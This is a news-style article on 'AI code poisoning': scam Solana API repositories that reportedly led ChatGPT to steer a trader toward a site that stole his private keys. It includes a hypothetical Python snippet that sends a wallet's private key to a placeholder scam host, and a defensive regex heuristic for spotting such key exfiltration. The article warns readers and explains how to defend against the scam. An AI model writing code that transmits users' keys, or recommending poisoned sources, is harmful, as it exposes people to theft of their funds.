AI Code Poisoning: A Growing Threat in the Tech World
Yu Xian, founder of the blockchain security firm SlowMist, recently raised concerns about a rising threat known as AI code poisoning. The attack involves injecting harmful code into the training data of AI models, posing serious risks for users who rely on these tools for technical tasks.
The Troubling Incident
The issue came to light through an incident involving OpenAI’s ChatGPT. A crypto trader known as “r_cky0” reported losing $2,500 in digital assets after asking ChatGPT for help building a trading bot for Pump.fun, a Solana-based memecoin generator.
Unfortunately, the chatbot recommended a fraudulent Solana API website, leading to the theft of the user’s private keys. Within just 30 minutes of using the malicious API, all assets were drained to a wallet associated with the scam.
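The actual malicious code was not published, but the pattern behind such scams is well known: the fraudulent “API” asks the user to submit their wallet’s private key, which a legitimate service never needs. The sketch below is purely hypothetical; every name and URL in it is invented for illustration.

```python
# Hypothetical sketch of the kind of "API client" a scam site might offer.
# All identifiers and URLs are invented; the red flag is that the client
# transmits the wallet's private key off the user's machine.

import json

SCAM_ENDPOINT = "https://api.example-scam.invalid/v1/createToken"  # invented

def build_create_token_request(private_key: str, token_name: str) -> dict:
    """Builds the request a poisoned 'SDK' might send. Note that the
    private key leaves the user's machine, letting the operator of the
    endpoint drain the wallet at will."""
    return {
        "url": SCAM_ENDPOINT,
        "body": json.dumps({
            "name": token_name,
            "signerPrivateKey": private_key,  # exfiltration: never send this
        }),
    }
```

A legitimate client would instead sign the transaction locally and transmit only the signed transaction, never the key itself.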
Further investigation revealed that the address receiving stolen tokens was linked to a known fraudster, raising suspicions of premeditation. The fraudulent API’s domain name was registered two months prior, and the website lacked substantial content, containing only documents and code repositories.
Although the poisoning appears intentional, there is no evidence that OpenAI deliberately integrated malicious data into ChatGPT’s training. The issue more likely stemmed from SearchGPT, ChatGPT’s web-search feature, surfacing the scam site from live search results rather than from the model’s training data.
Implications of AI Code Poisoning
Scam Sniffer, a blockchain security firm, has highlighted how scammers pollute AI training data with harmful crypto code. Notably, a GitHub user named “solanaapisdev” has in recent months been creating repositories designed to manipulate AI models into generating fraudulent outputs.
As AI tools like ChatGPT become increasingly popular, they face growing challenges from attackers seeking new ways to exploit them. Xian warned crypto users about the dangers associated with large language models (LLMs) like GPT, emphasizing the real threat of AI poisoning. Without stronger defenses, incidents like these could erode trust in AI-driven tools and expose users to significant financial losses.
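One practical defense is to never run AI-generated code against a funded wallet without review. A minimal heuristic sketch (an assumption on my part, not a complete or endorsed defense) could flag generated snippets that both reference a private key and make an outbound network call:

```python
import re

# Cheap heuristic: flag generated code that appears to transmit a private
# key to a remote endpoint. This catches an obvious pattern only; it is a
# prompt for manual review, not a substitute for it.
KEY_PATTERN = re.compile(r"(private[_ ]?key|secret[_ ]?key|mnemonic)", re.I)
SEND_PATTERN = re.compile(r"(requests\.(post|get)|fetch\(|axios\.|urlopen)", re.I)

def looks_like_key_exfiltration(source: str) -> bool:
    """Returns True if the snippet both references a private key and makes
    an outbound HTTP call -- a signal that warrants a closer look."""
    return bool(KEY_PATTERN.search(source)) and bool(SEND_PATTERN.search(source))

suspicious = 'requests.post(url, json={"private_key": pk})'
benign = "tx = sign_transaction(pk); client.send_raw_transaction(tx)"
```

Checks like this are trivially evaded by a determined attacker, which is why the broader lesson stands: treat any code a model produces, and any API it recommends, as untrusted until verified.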